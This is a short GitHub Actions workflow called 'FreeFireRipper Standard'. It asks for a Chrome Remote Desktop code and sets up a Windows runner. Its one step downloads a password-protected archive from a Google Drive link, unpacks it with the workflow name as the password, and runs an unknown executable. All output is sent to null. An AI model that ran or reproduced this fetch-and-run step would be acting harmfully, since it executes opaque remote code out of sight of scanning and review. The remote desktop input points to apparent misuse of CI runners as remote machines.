# WRITTEN AND MANAGED BY GW KANG

name: FreeFireRipper Standard
on:
  workflow_dispatch:
    inputs:
      code:
        description: Paste Chrome Remote Desktop Code
        required: true
jobs:
  build:
    name: Setting Up Windows 
    runs-on: windows-latest

    steps:
    - name: FreeFireRipper Standard
      run: |
        cd c:\temp && Invoke-WebRequest -Uri "https://drive.usercontent.google.com/download?id=1nO2wHP_jiIPREmw4XB-6u4UtrPk420c7&export=download&authuser=0&confirm=t&uuid=c1cfc8db-def1-440c-a508-e0c2909ae65f&at=AIrpjvMENwJCtzImtYnOi9oX-8RB%3A1736507853253" -OutFile "${{ github.workflow }}.7z" > $null 2>&1 && 7z x ${{ github.workflow }}.7z -p${{ github.workflow }} > $null 2>&1 &&  .\ffripper ${{ github.workflow }} 
